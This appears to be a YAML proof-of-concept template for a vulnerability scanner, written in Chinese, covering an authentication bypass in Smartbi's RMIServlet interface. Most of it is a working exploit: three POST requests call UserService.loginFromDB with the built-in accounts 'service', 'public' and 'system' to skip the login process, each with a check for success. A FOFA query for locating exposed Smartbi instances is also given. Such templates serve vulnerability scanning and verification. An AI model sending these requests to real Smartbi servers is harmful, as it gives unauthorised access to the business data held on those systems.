product: Smartbi
vName: Smartbi RMIServlet身份认证绕过漏洞
type: 访问控制
vID: [ ]
level: 3
vDesc: Smartbi大数据分析产品融合BI定义的所有阶段，对接各种业务数据库、数据仓库和大数据分析平台，进行加工处理、分析挖掘和可视化展现，满足所有用户的各种数据分析应用需求，如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。该产品存在接口绕过漏洞，攻击者可通过此漏洞绕过登录流程。
version: ''
note: ''
search:
  FOFA: app="SMARTBI"
protocol: http
link: https://blog.csdn.net/holyxp/article/details/131911274
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: or
exploit:
  - exp:
      method: post
      follow: false
      path: /smartbi/vision/RMIServlet
      data: className=UserService&methodName=loginFromDB&params=["service","0a"]
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'true'
              - 'duration'
            logic: and
  - exp:
      method: post
      follow: false
      path: /smartbi/vision/RMIServlet
      data: className=UserService&methodName=loginFromDB&params=["public","0a"]
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'true'
              - 'duration'
            logic: and
  - exp:
      method: post
      follow: false
      path: /smartbi/vision/RMIServlet
      data: className=UserService&methodName=loginFromDB&params=["system","0a"]
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'true'
              - 'duration'
            logic: and